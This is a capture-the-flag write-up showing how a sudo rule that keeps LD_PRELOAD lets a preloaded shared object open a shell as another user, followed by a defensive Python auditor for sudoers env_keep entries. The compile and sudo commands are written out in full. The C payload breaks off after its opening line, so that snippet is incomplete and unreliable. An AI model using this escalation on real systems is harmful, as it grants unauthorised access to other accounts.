For this challenge, we were given SSH access to a machine as the user ctf. Running sudo -l shows that we can run the /opt/Ivazov binary as ctf_cracked. That user has a flag.txt file in their home directory, which only they can read.

The sudo -l output also contains env_keep += LD_PRELOAD, which means sudo passes the LD_PRELOAD variable through to the program it runs. From there, we can try an LD_PRELOAD exploit. The steps taken here are copied from the guide that was just linked.

We save this code in /tmp/pe.c:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {

We compile and run it:

$ cd /tmp
$ # write the code to pe.c
$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
$ sudo -u ctf_cracked LD_PRELOAD=/tmp/pe.so /opt/Ivazov
$ # shell as ctf_cracked

And we can now cat /home/ctf_cracked/flag.txt: CYBERTF{LD_PRELOAD_2_Bypass_Ivazov}.
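
On the defensive side, the root cause is the env_keep entry in sudoers. The following is an added example, not part of the original writeup: a small auditor that flags Defaults lines whose env_keep list covers dynamic-loader variables, including wildcard entries. The sample sudoers text is constructed, and LD_LIBRARY_PATH and LD_AUDIT are included as an assumption beyond the LD_PRELOAD case shown on this page.

```python
import fnmatch
import re

# Loader variables that let the invoking user load code into the target process.
# LD_PRELOAD is the one from this page; the other two are added for the example.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")

# "Defaults", optionally scoped (Defaults:user, Defaults@host, Defaults!cmd, Defaults>runas)
DEFAULTS = re.compile(r'^\s*Defaults(?:[:@!>]\S+)?\s+(.*)$')
# env_keep = X  or  env_keep += "A B"; the removing form (-=) is deliberately not matched
ENV_KEEP = re.compile(r'\benv_keep\s*\+?=\s*(?:"([^"]*)"|(\S+))')

def logical_lines(text):
    """Join backslash-continued lines; yield (first_line_number, joined_text)."""
    buf, start = "", None
    for n, raw in enumerate(text.splitlines(), 1):
        start = start or n
        if raw.endswith("\\"):
            buf += raw[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None
    if buf:
        yield start, buf

def audit_sudoers(text):
    """Return [(line_number, finding)] for env_keep entries covering loader variables."""
    findings = []
    for n, line in logical_lines(text):
        m = DEFAULTS.match(line)
        if not m:  # comments, aliases and user specifications are skipped
            continue
        for quoted, bare in ENV_KEEP.findall(m.group(1)):
            for entry in (quoted or bare).rstrip(",").split():
                pattern = entry.split("=", 1)[0]  # entries may be NAME or NAME=value
                hits = [v for v in LOADER_VARS if fnmatch.fnmatchcase(v, pattern)]
                if hits:
                    findings.append((n, f"env_keep preserves {', '.join(hits)} via {entry!r}"))
    return findings

SAMPLE = "\n".join([  # constructed sudoers content, not taken from the challenge host
    "Defaults env_reset",
    "Defaults env_keep += LD_PRELOAD",
    '# Defaults env_keep += "LD_LIBRARY_PATH"',
    'Defaults:ctf env_keep += "LANG \\',
    '    LD_*"',
    "Defaults env_keep -= LD_PRELOAD",
    "ctf ALL=(ctf_cracked) /opt/Ivazov",
])
```

Calling audit_sudoers(SAMPLE) reports lines 2 and 4. Findings are per line, so a later env_keep -= that removes the variable again is not taken into account.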

